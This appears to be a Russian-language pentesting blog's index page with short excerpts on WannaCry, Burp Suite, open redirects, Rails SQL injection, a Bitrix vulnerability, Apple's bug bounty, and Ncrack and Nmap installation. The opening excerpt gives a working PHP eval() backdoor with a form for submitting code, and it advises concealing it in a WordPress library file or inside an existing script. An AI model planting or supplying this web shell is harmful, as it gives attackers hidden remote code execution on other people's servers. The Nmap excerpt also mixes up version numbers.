Пентестинг

Информационная безопасность (ИБ), Пентестинг (pentesting), этичный хакинг и анализ на проникновения

Простейший backdoor

Данный код основан на встроенной функции eval(), которая выполняет строку как php-код. Можно вставить этот код куда-нибудь поглубже. Например, в какую-нибудь библиотеку, типа "/wp-includes/js/tinymce/help.php". Можно вставить этот код не в отдельный файл, а во внутрь какого-нибудь скрипта, только с условием типа if (isset($_GET['eval'])) ...

<?php
if (isset($_POST['code'])) {
    eval(
$_POST['code']);
}
?>

<form action="" method="post">
<textarea name="code"></textarea><br />
<input type="submit" value="Отправить" />
</form>

Книга "Kali Linux Revealed"

Недавно (этим летом) вышло первое издание книги «Kali Linux Revealed: Mastering the Penetration Testing Distribution». Она посвящена работе в Kali Linux. Книгу на английском можно купить на Amazon, её можно читать онлайн или скачать в виде pdf-файла.

Основы работы с Burp Suite

Burp Suite - это интегрированная программа, предназначенная для проведения атак на веб-приложения. Burp Suite включает в себя разнообразные утилиты со специально спроектированным интерфейсом, позволяющими улучшить и ускорить процесс атаки на веб-сайты. Все эти инструменты основываются на мощном фреймворке, который позволяет им перехватывать и показывать пользователю HTTP и HTTPS сообщения, работать с аутентификацией, прокси-серверами и производить логирование различных данных.

Эпидемия вируса-шифровальщика (вымогателя) Wana Decrypt0r 2.0

В пятницу, 12 мая, многие организации по всей Европе и Азии подверглись масштабной кибератаке с использованием ранее неизвестной вредоносной программы. По данным экспертов, больше всех атака вируса затронула серверы на территории России и Тайваня.

По данным влиятельной группы экспертов по кибербезопасности MalwareHunterTeam, больше всех в результате атаки вируса пострадали серверы на территории России и Тайваня.

Open Redirect на различных форумах и блогах

Неделю назад мне сделали заказ на поиск уязвимостей на одном сайте. Сайт был предоставлен в исходных кодах и я имел полный доступ к файлам и базе данных... Но на сайте я почти ничего стоящего не нашел. Но вот в коде блога и форума нашел несколько уязвимостей XSS и Open Redirect... Форум был стандартный и пользуясь поиском Google я нашел примерно 100 с лишним сайтов с подобной уязвимостью. Я написал письма админам сайтов, они пообещали все скоро исправить.

Поэтому регулярно обновляйте скрипты стандартных форумов и блогов! Не ленитесь. Этим вы обезопасите себя и своих клиентов!

Примеры SQL Инъекций в Ruby On Rails

Недавно мне сделали заказ на тестирование веб-приложения на Ruby On Rails. И я нашел там несколько уязвимостей типа SQL инъекции. Для примеров SQL Инъекций в Ruby On Rails я взял справочный сайт http://rails-sqli.org/, который очень помог найти брешь в приложении. Многие думают, что уязвимостей в Ruby On Rails почти уже нет, но это не так... Кто ищет, тот находит! :-)

Уязвимости в последних версиях CMS 1С-Битрикс и видео атаки

16 января 2017 г. на Habrahabr'е была опубликована новый пост об  уязвимостях в последних версиях CMS 1С-Битрикс и видео атаки. Это сразу привлекло мое внимание :-) Так как я сам много раз находил и нахожу множественные XSS уязвимости в различных версиях 1С-Битрикс.

Небольшая цитата с поста:

Установка и использование Ncrack 0.5 на Linux

Ncrack - это высокоскоростная программа для подбора паролей для различных сервисов. Она часто будет нужна для пентеста и для оценки сложности паролей в системах Заказчика...

Сначала нужно скачать исходники Ncrack. Будем делать это в консоле Linux:

wget https://nmap.org/ncrack/dist/ncrack-0.5.tar.gz

tar -xzf ncrack-0.5.tar.gz

cd ncrack-0.5

./configure

make

su root

make install

Apple вводит программу BugBounty за уязвимости в своих продуктах

Все эти годы корпорация Apple отказывалась выплачивать вознаграждение тем пользователям, кто находил уязвимость в ее продукции и сообщал о проблеме. Сегодня все изменилось. Айван Крстич (Ivan Krstic), глава по инженерной безопасности и архитектуре Apple анонсировал на конференции Black Hat собственную bug bounty программу Apple. Максимальная сумма вознаграждения для специалистов, сообщивших об уязвимости, составит $200 000.

Установка Nmap 7.12 на Debian и Ubuntu Linux

Обычно я устанавливаю дистрибутив Nmap в Debian Linux (Ubuntu Linux) так:

sudo apt-get install nmap

Но иногда приходится (и для общего развития очень полезно!) устанавливать Nmap из исходников. И это тоже несложно...

В консоли открываем свой домашний каталог и выполняем wget:

wget https://nmap.org/dist/nmap-7.25BETA1.tar.bz2

bzip2 -cd nmap-7.25BETA1.tar.bz2 | tar xvf -

Далее cd nmap-7.25

Затем ./configure

RSS-материал